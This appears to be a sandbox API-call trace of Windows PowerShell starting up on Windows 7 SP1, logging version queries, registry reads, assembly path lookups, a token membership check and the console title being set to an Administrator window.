	[0702.825] lstrcpyW (in: lpString1=0x1cf9e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0702.826] CoTaskMemFree (pv=0x1cf9e0) 
	[0702.826] VerQueryValueW (in: pBlock=0x2caa960, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14dc38, puLen=0x14dc30 | out: lplpBuffer=0x14dc38*=0x2caaccc, puLen=0x14dc30) returned 1
	[0702.826] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0702.826] CoTaskMemAlloc (cb=0x44) returned 0x240970
	[0702.826] lstrcpyW (in: lpString1=0x240970, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0702.826] CoTaskMemFree (pv=0x240970) 
	[0702.826] VerQueryValueW (in: pBlock=0x2caa960, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14dc38, puLen=0x14dc30 | out: lplpBuffer=0x14dc38*=0x2caad30, puLen=0x14dc30) returned 1
	[0702.826] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0702.826] CoTaskMemAlloc (cb=0x58) returned 0x1b6c20
	[0702.826] lstrcpyW (in: lpString1=0x1b6c20, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0702.826] CoTaskMemFree (pv=0x1b6c20) 
	[0702.826] VerQueryValueW (in: pBlock=0x2caa960, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14dc38, puLen=0x14dc30 | out: lplpBuffer=0x14dc38*=0x2caadac, puLen=0x14dc30) returned 1
	[0702.826] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0702.826] CoTaskMemAlloc (cb=0x20) returned 0x23d920
	[0702.826] lstrcpyW (in: lpString1=0x23d920, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0702.826] CoTaskMemFree (pv=0x23d920) 
	[0702.826] VerQueryValueW (in: pBlock=0x2caa960, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14dc38, puLen=0x14dc30 | out: lplpBuffer=0x14dc38*=0x2caaa54, puLen=0x14dc30) returned 1
	[0702.826] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0702.826] CoTaskMemAlloc (cb=0x66) returned 0x232490
	[0702.826] lstrcpyW (in: lpString1=0x232490, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0702.826] CoTaskMemFree (pv=0x232490) 
	[0702.826] VerQueryValueW (in: pBlock=0x2caa960, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14dc38, puLen=0x14dc30 | out: lplpBuffer=0x14dc38*=0x0, puLen=0x14dc30) returned 0
	[0702.826] VerQueryValueW (in: pBlock=0x2caa960, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14dc38, puLen=0x14dc30 | out: lplpBuffer=0x14dc38*=0x0, puLen=0x14dc30) returned 0
	[0702.826] VerQueryValueW (in: pBlock=0x2caa960, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14dc38, puLen=0x14dc30 | out: lplpBuffer=0x14dc38*=0x0, puLen=0x14dc30) returned 0
	[0702.826] VerQueryValueW (in: pBlock=0x2caa960, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14dc08, puLen=0x14dc00 | out: lplpBuffer=0x14dc08*=0x2caa9fc, puLen=0x14dc00) returned 1
	[0702.826] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0702.826] VerLanguageNameW (in: wLang=0x0, szLang=0x1d21e0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0702.826] CoTaskMemFree (pv=0x1d21e0) 
	[0702.827] VerQueryValueW (in: pBlock=0x2caa960, lpSubBlock="\\", lplpBuffer=0x14dc58, puLen=0x14dc50 | out: lplpBuffer=0x14dc58*=0x2caa988, puLen=0x14dc50) returned 1
	[0702.834] CoTaskMemAlloc (cb=0x104) returned 0x1d1840
	[0702.834] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d1840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0702.835] CoTaskMemFree (pv=0x1d1840) 
	[0702.836] CoTaskMemAlloc (cb=0x104) returned 0x1d1840
	[0702.836] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d1840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0702.836] CoTaskMemFree (pv=0x1d1840) 
	[0702.843] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14db28 | out: phkResult=0x14db28*=0x2f4) returned 0x0
	[0702.844] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x14db18 | out: phkResult=0x14db18*=0x2f8) returned 0x0
	[0702.845] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14dba8 | out: phkResult=0x14dba8*=0x2fc) returned 0x0
	[0704.516] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14daec, lpData=0x0, lpcbData=0x14dae8*=0x0 | out: lpType=0x14daec*=0x1, lpData=0x0, lpcbData=0x14dae8*=0x56) returned 0x0
	[0704.517] CoTaskMemAlloc (cb=0x5a) returned 0x232420
	[0704.517] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14dabc, lpData=0x232420, lpcbData=0x14dab8*=0x56 | out: lpType=0x14dabc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14dab8*=0x56) returned 0x0
	[0704.517] CoTaskMemFree (pv=0x232420) 
	[0704.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0704.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0704.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0704.552] CoTaskMemAlloc (cb=0x104) returned 0x1d1840
	[0704.552] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d1840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0704.552] CoTaskMemFree (pv=0x1d1840) 
	[0717.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0717.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0720.829] CoTaskMemAlloc (cb=0x104) returned 0x185b10
	[0720.829] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x185b10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0720.829] CoTaskMemFree (pv=0x185b10) 
	[0720.830] CoTaskMemAlloc (cb=0x104) returned 0x24bec0
	[0720.830] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24bec0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0720.830] CoTaskMemFree (pv=0x24bec0) 
	[0722.453] CoTaskMemAlloc (cb=0x104) returned 0x24bec0
	[0722.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24bec0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0722.453] CoTaskMemFree (pv=0x24bec0) 
	[0722.455] CoTaskMemAlloc (cb=0x104) returned 0x24bec0
	[0722.455] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24bec0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0722.455] CoTaskMemFree (pv=0x24bec0) 
	[0722.456] CoTaskMemAlloc (cb=0x104) returned 0x24bec0
	[0722.456] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24bec0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0722.456] CoTaskMemFree (pv=0x24bec0) 
	[0727.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0727.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0729.063] CoTaskMemAlloc (cb=0x104) returned 0x24bec0
	[0729.063] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24bec0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0729.063] CoTaskMemFree (pv=0x24bec0) 
	[0729.064] CoTaskMemAlloc (cb=0x104) returned 0x24bec0
	[0729.064] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24bec0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0729.064] CoTaskMemFree (pv=0x24bec0) 
	[0731.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0740.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0740.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0741.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0741.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0745.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0745.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0749.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0749.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0749.733] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0749.733] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0749.733] CoTaskMemFree (pv=0x24c0e0) 
	[0751.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0751.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0751.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0752.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x14d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0752.414] SetErrorMode (uMode=0x1) returned 0x1
	[0752.415] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x14da80 | out: lpFileInformation=0x14da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0752.415] SetErrorMode (uMode=0x1) returned 0x1
	[0759.071] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0759.071] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.071] CoTaskMemFree (pv=0x24c0e0) 
	[0759.072] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0759.072] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.072] CoTaskMemFree (pv=0x24c0e0) 
	[0759.073] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0759.073] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.073] CoTaskMemFree (pv=0x24c0e0) 
	[0759.076] CoCreateGuid (in: pguid=0x14de48 | out: pguid=0x14de48*(Data1=0x1560db14, Data2=0x4106, Data3=0x415e, Data4=([0]=0xb5, [1]=0x9b, [2]=0xe8, [3]=0x86, [4]=0x75, [5]=0x25, [6]=0xa3, [7]=0x20))) returned 0x0
	[0759.079] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0759.079] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.079] CoTaskMemFree (pv=0x24c0e0) 
	[0759.082] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0759.082] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.082] CoTaskMemFree (pv=0x24c0e0) 
	[0759.085] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0759.085] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.085] CoTaskMemFree (pv=0x24c0e0) 
	[0759.104] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0760.462] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x14daf0 | out: lpConsoleScreenBufferInfo=0x14daf0) returned 1
	[0760.486] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0760.487] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x14daf0 | out: lpConsoleScreenBufferInfo=0x14daf0) returned 1
	[0760.488] GetVersionExW (in: lpVersionInformation=0x14da80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14da80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0760.491] GetCurrentProcess () returned 0xffffffffffffffff
	[0760.492] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14db18 | out: TokenHandle=0x14db18*=0x30c) returned 1
	[0760.500] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14da38 | out: TokenInformation=0x0, ReturnLength=0x14da38) returned 0
	[0760.501] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x197290
	[0760.501] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x197290, TokenInformationLength=0x4, ReturnLength=0x14da38 | out: TokenInformation=0x197290, ReturnLength=0x14da38) returned 1
	[0760.502] DuplicateTokenEx (in: hExistingToken=0x30c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x14db98 | out: phNewToken=0x14db98*=0x308) returned 1
	[0760.502] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14da38 | out: TokenInformation=0x0, ReturnLength=0x14da38) returned 0
	[0760.503] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x197180
	[0760.503] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x197180, TokenInformationLength=0x4, ReturnLength=0x14da38 | out: TokenInformation=0x197180, ReturnLength=0x14da38) returned 1
	[0761.463] CheckTokenMembership (in: TokenHandle=0x308, SidToCheck=0x2d85708*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x14dba8 | out: IsMember=0x14dba8) returned 1
	[0761.463] CloseHandle (hObject=0x308) returned 1
	[0761.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0761.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0761.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0761.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0762.828] CoTaskMemAlloc (cb=0x804) returned 0x1ba48610
	[0762.828] GetConsoleTitleW (in: lpConsoleTitle=0x1ba48610, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0762.828] CoTaskMemFree (pv=0x1ba48610) 
	[0762.852] CoTaskMemAlloc (cb=0x804) returned 0x1ba48ec0
	[0762.852] GetConsoleTitleW (in: lpConsoleTitle=0x1ba48ec0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0762.853] CoTaskMemFree (pv=0x1ba48ec0) 
	[0762.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0762.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0762.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0762.855] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
